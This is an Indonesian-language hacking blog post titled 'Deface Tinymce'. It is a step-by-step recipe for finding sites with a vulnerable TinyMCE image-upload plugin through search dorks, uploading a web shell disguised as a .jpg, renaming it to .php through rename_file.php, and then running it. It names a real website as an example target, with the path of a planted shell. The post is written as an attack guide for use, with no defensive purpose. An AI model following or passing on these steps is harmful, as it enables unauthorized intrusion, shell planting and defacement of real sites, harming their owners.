Deface Tinymce

bahan-bahan
-kuota
-hp/lepi
-gans
-csrf:
Disini (ext:html)
-dork:
inurl:tinymce/plugins/image
inurl:tinymce/plugins/image/upload.php

exploit:
/tinymce/plugins/image/upload.php
atau
/[path]/tinymce/plugins/image/upload.php

next
1.kalian dorking dlu pake dork diatas,atau klo klean punya otak kalean kembngkan sendiri
2.pilih web yang menurut kalian vuln
3.masukan exploitnya
http://www.myphamthai.com.vn/[exploit]
http://www.myphamthai.com.vn/tinymce/plugins/image/upload.php

"vuln"

4.ubah shell atau script kalian extensi jpg

5.buka csrf yg udah gw kasih diatas

6.ubah web yang we tandain

7.langsung jalankan,upload shell atau script yg klian ubah ke jpg tdi,upload

8.kemudian rename nama filenya

web.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php

"success"

9.tinggal panggil dehh

web.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php

http://www.myphamthai.com.vn/tinymce/plugins/image/uploads/yah.php

sekian

#Light Cyber Indonesia

Deface Tinymce

Post a Comment

0 Comments

Report Abuse

PROFIL

Search This Blog

Arsip

Facebook

Popular Posts

Improved File Manager + upload shell

Online Compiler To Rce(Remote Code Execution)

Cara Dorking dan Download Ip List Dari Shodan

Recent Posts

Recent in Recipes

Deface Tinymce

Post a Comment

0 Comments

Report Abuse

PROFIL

Search This Blog

Arsip

Social Plugin

Facebook

Popular Posts

Improved File Manager + upload shell

Online Compiler To Rce(Remote Code Execution)

Cara Dorking dan Download Ip List Dari Shodan

Recent Posts

Recent in Recipes